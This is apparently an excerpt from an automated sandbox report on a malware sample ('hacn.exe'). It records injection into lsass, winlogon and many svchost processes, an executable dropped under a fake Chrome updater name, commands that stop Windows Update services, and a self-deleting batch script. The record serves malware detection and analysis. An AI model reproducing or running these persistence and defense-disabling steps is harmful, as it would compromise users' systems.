Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEFF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8810000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 28855150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25EF7B10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 209A6850000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 238E5420000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 283B9F80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FC2C760000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F095230000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1AFBEF40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 222412F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29CA4D30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2786ADF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F086AE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F086D10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\reg.exe base: 1E5DD230000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 20D20C40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20893350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616B760000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BA10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 15AD96F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\reg.exe base: 1E3D8050000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208620F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208623A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142D0000

Source: C:\Users\user\Desktop\hacn.exe	Process created: C:\Users\user\Desktop\hacn.exe C:\Users\user\Desktop\hacn.exe	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"	Jump to behavior
Source: C:\ProgramData\main.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7748"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Source: C:\Windows\System32\dialer.exe

Code function: 17_2_00007FF65A131B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

17_2_00007FF65A131B54

Source: C:\Windows\System32\dialer.exe

Code function: 17_2_00007FF65A131B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

17_2_00007FF65A131B54

Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 00000016.00000002.2894373111.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000000.1729324605.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Source: C:\Users\user\Desktop\hacn.exe

Code function: 0_2_00007FF61D349F40 cpuid

0_2_00007FF61D349F40

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

4_2_000FAF0F

Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hacn.exe	Queries volume information: C:\Users\user\Desktop\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\main.exe	Queries volume information: C:\ProgramData\main.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\main.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\main.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
